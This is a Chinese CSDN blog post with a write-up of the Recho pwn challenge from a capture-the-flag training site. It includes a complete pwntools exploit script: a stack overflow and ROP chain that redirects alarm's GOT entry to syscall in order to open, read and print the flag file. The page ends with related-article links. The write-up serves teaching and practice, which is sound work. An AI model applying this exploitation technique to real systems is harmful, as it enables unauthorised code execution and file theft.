Rcheo--攻防世界pwn

最新推荐文章于 2023-02-07 11:37:59 发布
置顶 最新推荐文章于 2023-02-07 11:37:59 发布
阅读量265 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NC_Return/article/details/114443592
版权

1.先查一下保护机制,程序只开了NX保护,堆栈不可执行
在这里插入图片描述2.拖入IDA
在这里插入图片描述
首先会让你输入要输入的字符串长度,再进行输入字符串,显然可以在这里进行栈溢出,但是没什么攻击的思路,继续查找线索,看一下存在的字符串
在这里插入图片描述发现没有你以前想要的system ,bin/sh之类的东西反而有个flag,那么就有个思路我们能不能直接把flag文件读出来,根据题目现有条件我们可以先执行open–>read–>printf得到我们的flag,但是发现主函数是个死循环,没办法执行我们的payload,好在pwntools有个shutdown函数可以跳出循环,那么理论结束开始写exp
在这里插入图片描述选择适合的开始构造payload,首先我们需要把alarm函数的GOT表修改成syscall的地址,来构造执行open系统调用
在这里插入图片描述
看到alarm的系统调用号是0x25,然后调用syscall,我们开始修改GOT表,讲GOT的值加上0x5便是syscall,将调用号改为open的就行,找到合适的gadget
在这里插入图片描述

payload = 'A'*0x38#覆盖到ebp
payload += p64(pop_rdi) + p64(alarm_got)#将got表的值给rdi 
payload += p64(pop_rax) + p64(0x5)#0x5赋值al
payload += p64(rdi_add)#地址加上0x5到syscall

接下来就是构造open fd=open(‘flag’,READONLY)

syscall的传参顺序是rdi,rsi,rdx,r10,r9,r8
#rsi=0(READONLY)
payload += p64(pop_rsi_r15) + p64(0) + p64(0)
#rdi='flag'
payload += p64(pop_rdi) + p64(elf.search('flag').next())
#open系统调用号为2,rax赋值为2
payload += p64(pop_rax) +p64(2)
#syscall
payload += p64(alarm_plt)

执行完open就该把flag写到可写的地方bss段
在这里插入图片描述构造read(fd,stdin_buf,100);这里应该注意的是fd一般会从3开始,打开一个文件是3那么第二个文件时是4

#将stdin_buf指向bss段的可写位置
payload += p64(pop_rsi_r15) + p64(stdin_buf) + p64(0)
#fd=3
payload += p64(pop_rdi) + p64(3)
#rax=100,最多读取100个字符
payload += p64(pop_rdx) + p64(100)
#调用read函数
payload += p64(read_plt)

flag已经写到指定的位置,用printf输出flag

#用printf打印flag
payload += p64(pop_rdi) + p64(stdin_buf) + p64(printf_plt)

使用shutdown使循环退出,main函数执行到retn处,执行ROP

#退出循环,ret执行ROP
io.shutdown()

exp如下:

#coding:utf8
from pwn import *
context.log_level = 'debug'
io = process('./Recho')

elf = ELF('./Recho')
pop_rax = 0x4006FC  
pop_rdx = 0x4006FE      
pop_rdi = 0x4008A3  
rdi_add = 0x40070d
pop_rsi_r15 = 0x4008A1

stdin_buf = 0x601070

alarm_got = elf.got['alarm']
alarm_plt = elf.plt['alarm']
read_plt = elf.plt['read']
printf_plt = elf.plt['printf']

io.recvuntil('Welcome to Recho server!\n')
io.sendline(str(0x200))

payload = 'A'*0x38
payload += p64(pop_rdi) + p64(alarm_got) 
payload += p64(pop_rax) + p64(0x5)
payload += p64(rdi_add)
payload += p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(pop_rdi) + p64(elf.search('flag').next())
payload += p64(pop_rax) +p64(2)
payload += p64(alarm_plt)
payload += p64(pop_rsi_r15) + p64(stdin_buf) + p64(0)
payload += p64(pop_rdi) + p64(3)
payload += p64(pop_rdx) + p64(100)
payload += p64(read_plt)
payload += p64(pop_rdi) + p64(stdin_buf) + p64(printf_plt)
payload = payload.ljust(0x200,'\x00')
io.sendline(payload)
io.shutdown()
io.interactive()
@Return
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN系列】攻防世界 RECHO 题解
Vicl1fe的博客
11-03 461
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.freesion.com/article/5370510581/ 参考网址写的很详细。转载一下。
攻防世界 pwn
清霂的博客
02-02 683
目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题 连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护,不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4,注意有gets函数,不限制输入,但无法溢出,点进去v4,v5 发现var_18是v5,var_20是v4,那么可以输入v4时将v5的值覆盖为19
攻防世界--Recho
qq_73149934的博客
02-07 234
攻防世界--Recho
攻防世界】Recho
weixin_43960998的博客
03-28 723
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
攻防世界PWN之Recho题解
seaaseesa的博客
11-09 2373
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
[HarekazeCTF2019]baby_rop2
、moddemod
06-17 381
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './babyrop2' p = process(proc_name) # p = remote('node3.buuoj.cn', 29966) elf = ELF(proc_name) print(proc.pidof(p)) main_add..
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2864
get_shell
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 433
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2584
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1591
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
Pwntools遇到Got EOF while reading in interactive【未完全解决】
qq_43596950的博客
02-18 1万+
我没有解决这个bug,但我想提供一种思路 pwn初学者,写缓冲区溢出时拿shell遇到了Got EOF while reading in interactive。 1、更换system函数 程序源代码: #include<stdio.h> #include<unistd.h> #include<stdlib.h> #include<string.h> void exploit(){ //system("/bin/sh"); //使用syst
pwn入门
热门推荐
九层台
03-27 1万+
之前学过一点关于pwn,不过总是断断续续,学一点就停止了,这次准备好好学一下。推荐一个网站这是个练习pwn的很好的网站 FD 先连上去 查看fd.c文件 main函数中:argc是命令行参数个数,char *argv[]是指所有命令行参数,char *envp[]是环境变量(argv[1]位置处存放的是命令行输入的第一个参数) atoi函数的作用是把字符转化为int型数据。 ...
使用R语言的SOM算法对鸢尾花数据集进行自组织映射分析
09-03
在数据科学中,Self-Organizing Maps (SOM) 是一种无监督学习算法,通过自组织神经网络对数据进行聚类和降维。这种算法特别适合处理高维数据,能够将复杂的数据结构映射到低维空间,以便更容易地进行分析和可视化。 首先,我们加载kohonen包,这是R语言中实现SOM算法的主要工具。如果系统中尚未安装该包,我们需要先进行安装。随后,我们使用鸢尾花数据集,这是一种经典的多特征数据集,其中包含150个样本,每个样本有4个特征(花萼长度、花萼宽度、花瓣长度和花瓣宽度),以及一个目标变量(花的品种)。为了提高聚类效果,我们首先对这些特征进行标准化处理,将数据转换为均值为0,方差为1的标准正态分布。 在设置SOM模型时,我们指定了一个5x5的六边形网格。这个网格的选择影响了SOM模型的表现,因为它决定了数据映射的细节。.......
【创新未发表】Matlab实现白鲨优化算法WSO-GRU实现风电数据预测算法研究.rar
09-03
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
网络协议ISIS路由原理、配置命令
最新发布
09-03
网络协议ISIS路由原理、配置命令
一个排球场预约小程序,基于微信云开发-ComeAndMeetVolley.zip
09-03
一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip 一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip 一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip 一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip 一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip 一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip 一个排球场预约小程序,基于微信云开发_ComeAndMeetVolley.zip
constructor .html
09-03
constructor
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值